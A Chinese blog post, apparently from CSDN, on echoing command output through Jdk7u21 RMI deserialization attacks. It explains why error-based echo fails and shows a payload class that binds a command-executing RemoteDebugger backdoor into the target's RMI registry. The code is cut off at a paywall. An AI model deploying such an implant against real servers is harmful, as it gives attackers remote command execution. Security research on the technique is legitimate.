java反序列之Jdk7u21回显

于 2021-12-06 19:26:22 发布
阅读量2.2k 收藏
点赞数
文章标签: java 后端 架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64354070/article/details/121753966
版权

以前在打RMI反序列化的时候都是用的CC、CB利用链实现报错回显,很好使。

之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。

通过延时探测出只存在Jdk7u21利用链。

RMI回显

打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用链用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。

Jdk7u21利用链也是利用的AnnotationInvocationHandler动态代理,通过HashSet触发到代理handler的equal方法,最终到

sun.reflect.annotation.AnnotationInvocationHandler#equalsImpl

private Boolean equalsImpl(Object var1) {
    if (var1 == this) {
        return true;
    } else if (!this.type.isInstance(var1)) {
        return false;
    } else {
        Method[] var2 = this.getMemberMethods();
        int var3 = var2.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            Method var5 = var2[var4];
            String var6 = var5.getName();
            Object var7 = this.memberValues.get(var6);
            Object var8 = null;
            AnnotationInvocationHandler var9 = this.asOneOfUs(var1);
            if (var9 != null) {
                var8 = var9.memberValues.get(var6);
            } else {
                try {
                    var8 = var5.invoke(var1);
                } catch (InvocationTargetException var11) {
                    return false;
                } catch (IllegalAccessException var12) {
                    throw new AssertionError(var12);
                }
            }

可以发现在在invoke反射调用templatesimpl#newTransformer方法时,捕获了异常。当捕获InvocationTargetException异常时返回了false,捕获IllegalAccessException异常时,继续向上抛了异常。

在反射过程中,反射所调用的方法中出现未被捕获的异常时,就会抛出InvocationTargetException异常,所以这里通过templatesimpl执行任意代码抛出任意异常(包括IllegalAccessException)回显,只能进入return false的分支,最终无法实现异常回显。

搞清楚了无法通过异常回显的原因后,接着就开始寻思其他的解决方案,首先能想到的就是参考weblogic的T3/IIOP回显,绑定一个服务到registry上。

在T3回显中,服务类实现了ClusterMasterRemote接口再绑定到registry,不过ClusterMasterRemote是Weblogic中自带的类不适用我们的场景。

这时候去得去jdk里找一个继承了java.rmi.Remote的接口,为了比较简单的传递命令和返回命令结果,参数类型和返回类型都为String方便一点。

翻了一会,只找到了一个符合要求的接口,sun.jvm.hotspot.debugger.remote.RemoteDebugger。

public interface RemoteDebugger extends Remote {
...........
        String consoleExecuteCommand(String var1) throws RemoteException;
}

然后定义一个类实现这个接口,最后暴露实现类最后绑定到registry,本地直接绑定成功。

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import sun.jvm.hotspot.debugger.MachineDescription;
import sun.jvm.hotspot.debugger.ReadResult;
import sun.jvm.hotspot.debugger.remote.RemoteDebugger;
import java.io.IOException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RMIBindService2 extends AbstractTranslet implements RemoteDebugger {

    public RMIBindService2() throws RemoteException {
        try {
            Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
            UnicastRemoteObject.exportObject(this, 0);
            registry.rebind("hhhh", this);
        }catch(Exception e){
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    @Override
    public String getOS() throws RemoteException {
        return null;
    }

    @Override
    public String getCPU() throws RemoteException {
        return null;
    }

    @Override
    public MachineDescription getMachineDescription() throws RemoteException {
        return null;
    }

    @Override
    public long lookupInProcess(String s, String s1) throws RemoteException {
        return 0;
    }

    @Override
    public ReadResult readBytesFromProcess(long l, long l1) throws RemoteException {
        return null;
    }

    @Override
    public boolean hasConsole() throws RemoteException {
        return false;
    }

    @Override
    public String getConsolePrompt() throws RemoteException {
        return null;
    }

    @Override
    public String consoleExecuteCommand(String command) throws RemoteException {
        boolean isLinux = true;
        String osTyp = System.getProperty("os.name");
        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
            isLinux = false;
        }

        String[] cmds = isLinux ? new String[]{"sh
最低0.47元/天 解锁文章
杰杰架构师Java
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rmi 序列化漏洞_写一个rmi序列化工具
weixin_39997037的博客
01-07 2167
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在序列化漏洞。RMI和java序列化原理就不详细介绍了。RMI序列化利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在序列化链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
Java安全攻防之从wsProxy到AbstractTranslet
tomato_bro的博客
08-23 1519
安全攻防
java序列化_Java序列化系列 ysoserial Jdk7u21
weixin_40003451的博客
11-17 304
0x01Jdk7U21漏洞简介谈到java序列化,就绕不开一个经典的漏洞,在ysoserial 的payloads目录下 有一个jdk7u21,以往的序列化Gadget都是需要借助第三方库才可以成功执行,但是jdk7u21的Gadget执行过程中所用到的所有类都存在在JDK中,JRE版本<=7u21都会存在此漏洞0x02 Jdk7u21漏洞原理深入讲解漏洞执行流程整体的恶意...
attackRmi:AttackRmi
04-12
AttackRmi 该项目使用套接字将数据包直接发送到攻击rmi。 以下jdk版本指的是openjdk的版本 以下方法通过序列化攻击rmi,因此以下6种攻击方法要求本地类路径包含小工具 AttackRegistryByBindAndAnnotationInvocationHandler 这实际上是ysoserial的RMIRegistryExploit。 状况: <jdk8u121 AttackRegistryByDGC 状况: <jdk8u121 AttackRegistryByLookup 状况: <jdk8u121 AttackRegistryByLookupAndUnicastRef 状况: <jdk8u232 AttackRegistryByLookupAndUnicastRefRemoteObject 状况: <jdk8u242 A
jdk-7u21-windows-x64.exe
01-24
java最常用的jdk版本,在windows下双击运行可直接安装,安装成功后,配上环境变量就可以使用。
Java JDK 8u321 for Windows 64位 安装程序
04-09
Java JDK 8u321是Oracle公司发布的Java Development Kit的一个特定版本,主要针对Windows 64位操作系统。这个版本的JDK包含了开发和运行Java应用程序所需的全部工具和库。在本文中,我们将深入探讨Java JDK 8u321在...
java-jdk1.8-8u361-all-jdk-win-linux
01-31
java-jdk1.8-8u361-all-jdk-win-linux 该压缩包中包含jdk1.8-8u361下windows版本和linux版本,其包含快速安装包和对应的jdk压缩包版本,具体内容如下: jdk-8u361-linux-aarch64.rpm jdk-8u361-linux-i586.rpm jdk-8...
Java SE Development Kit 8u321 centos7 jdk1.8.8u321
02-24
Java SE Development Kit 8u321 centos7 jdk1.8.8u321 官网下载
java jdk 8 帮助文档 中文 文档 chm 谷歌翻译
04-02
JDK1.8 API 中文谷歌翻译版 java帮助文档 JDK API java 帮助文档 谷歌翻译 JDK1.8 API 中文 谷歌翻译版 java帮助文档 Java最新帮助文档 本帮助文档是使用谷歌翻译,非人工翻译。准确性不能保证,请与英文版配合使用 ...
linux环境java8安装包jdk-8u212-linux-x64
最新发布
10-21
本篇将详细讲解如何在Linux系统中安装"jdk-8u212-linux-x64"这个特定版本的Java 8 JDK。 首先,我们关注的是"jdk-8u212-linux-x64"这个文件名。这表明它是Java 8的第212次更新(Update),并且是针对64位(x64)...
jdk-7u21-windows-i586.part1.rar
06-06
最新版jdk7.0,免费送上方便大家下载,分为2个部分,请大家都下载后在解压~~
java 7u21_java培训班 | JDK序列化Gadgets-7u21
weixin_28750663的博客
03-04 209
从fastjson1.24版本的序列化利用方式知道有使用jdk7u21的版本利用链,ysoserial利用工具中也有7u21利用链。现在都是7u80版本了,这个漏洞真正直接利用,估计已经很难找到了。但是这个利用链的构造有很多之前没接触过的java特性,就此好好学习一下,也算是fastjson的前置知识吧。先去Oracle官网下载漏洞jdk版本7u21,漏洞影响7u25之前的版本,整条链poc貌似...
weblogic使用jdk7u21 gadget以及回显
公众号shadow sock7
09-03 808
参考: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jdk7u21.java Java 序列化漏洞始末(2)— JDK 条件: jdk < = 7u21 Weblogic与jdk的兼容性问题 好像10.3.6不支持jdk 1.8,不过好像可以先用jdk 6,7安装之后然后bypass。 https://stackoverflow.com/questions/22513660/
JAAS 是个什么梗
Microstrong
12-13 3194
转载地址:https://www.cnblogs.com/youxia/p/java006.html 参考资料 该文中的内容来源于 Oracle 的官方文档。Oracle 在 Java 方面的文档是非常完善的。对 Java 8 感兴趣的朋友,可以从这个总入口 Java SE 8 Documentation 开始寻找感兴趣的内容。本博客不定期从 Oracle 官网搬砖。这一篇主要讲
struts2漏洞批量检查
oscarli的博客
11-21 5618
检查代码来自 Lucifer。#!/usr/bin/env python # coding=utf-8 # code by Lucifer # Date 2017/10/12 import sys import base64 import warnings import requests from termcolor import cprint warnings.filterwarnings("
回馈站长,5w.com 网址导航模板设计大赛开锣了
taoku123的专栏
12-17 1633
<br /> <br /> <br />      <br />中国网民层次很多,很多初级网民喜欢使用网址导航在互联网冲浪,对于初级网民来说网站导航无疑是一款别致的GPS,因简单、实用而备受广大网名的青睐。这个现象和国外网民相比具有显著的差异,国外网民大多使用搜索引擎作为他们的导航方式,如google、yahoo。<br /><br />根据艾瑞的统计数据,2010年8月中国互联网网民中,导航网站的互联网用户规模达到2.3亿人,占所有网站访问用户规模的62.5%,2010年4月,该比重最上升到了66.4%。
JRE8u20序列化漏洞
xiaoWhite_meng的博客
07-10 780
JRE8u20序列化漏洞分析美丽联合安全MLSRC2018-07-09共16208人围观WEB安全漏洞0×00 TLDR之前在第一篇文章中我们简单的讲了一下Java序列化机制,即通过ObjectOutputStream和ObjectInputStream来实现序列化和序列化,但是内部的机制和原理一并跳过了。JRE8u20这个漏洞是其他人在之前JDK7u21的基础上进行改进得到了,他绕过了Ja...
Lib之过?Java序列化漏洞通用利用分析
weixin_34259159的博客
11-14 437
2019独角兽企业重金招聘Python工程师标准>>> ...
elk权限控制_7. ELK安全配置(上)
weixin_33347102的博客
12-29 814
> ##### [感谢江榕分享](https://www.tuicool.com/articles/6fyU7bU)> ##### [感谢chenzanlong123](http://blog.csdn.net/chenzanlong123/article/details/11784143 "关于truststore和kenstore的区别") 关于truststore和kenstor...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值